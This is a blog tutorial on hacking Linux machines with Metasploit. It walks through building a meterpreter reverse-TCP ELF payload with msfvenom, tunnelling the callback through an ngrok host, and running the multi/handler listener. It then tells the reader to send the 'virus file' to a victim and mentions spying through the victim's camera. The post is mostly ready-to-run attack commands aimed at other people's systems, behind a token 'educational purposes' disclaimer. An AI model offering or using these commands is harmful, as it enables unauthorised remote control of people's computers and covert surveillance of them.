In this post, you will know How to hack linux with Metasploit. We can Hack any operating system with Metasploit by using its payloads and Linux payload is one of them. It is very easy to gain access to someone’s system by Metasploit. So let’s hack Linux…

Disclaimer – This blog is for educational purposes only, If you do anything illegal then we are not responsible for it…

What Is Metasploit?

The Metasploit Framework is an open-source powerful tool that is used by CyberCriminals as well as Ethical-Hackers to find systematic vulnerabilities on networks and servers because it can be easily customized and used in most Linux operating systems.

Metasploit came preinstalled in many Linux operating systems like Kali Linux, Parrot OS, etc. But if you don’t have it then you can install it by typing ( sudo apt-get install metasploit-framework )…

Metasploit: How to hack linux with Metasploit

So 1st we have to create our ngrok server to use this ( Linux elf file ) anywhere. Now come inside the directory where your ngrok is saved then type this command ( ./ngrok tcp 4242 )…

Note – Read and type all commands very carefully because if you type a single wrong command so Metasploit will not work…

Now we have to create an ( elf file ) that will help us to gain access to our victim’s computer.

So for making the virus file type this payload command ( msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf lhost=<your ngrok URL> lport=<your ngrok port> -o <file name>.elf ). See the photo for better understanding…

How to hack linux with Metasploit

Now you have to wait for 2 to 3 minutes to complete it…

You can see an ( elf file ) is built in your home directory. Now we have to create our listener with which we will control our target’s system…

Follow The Steps For Creating Listener:-

  • Command 1 – msfconsole
  • Command 2 – use exploit/multi/handler
  • Command 3 – set payload linux/x64/meterpreter/reverse_tcp
  • Command 4 – set lhost 0.0.0.0
  • Command 5 – set lport ( YOUR PORT NUMBER )
  • Command 6 – exploit

Now all done just send your virus file to your target and if he/she will open it then we will get remote access to their system…

So what we can do after gaining access to their Linux. For example – we can check their system operating system information, click screenshots through their front camera, and a lot more things…

You can check our second blog which is on hacking android with Metasploit – ( https://reconcybersecurity/blog/hack-android-device-with-metasploit-2021-n4h/ )

Tips – For viewing all of the hacking commands you can type ( help )…

If you have any problem with our blog so you can comment to us we will try to fix it.

– Recon

0 Shares:
1 comment
Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like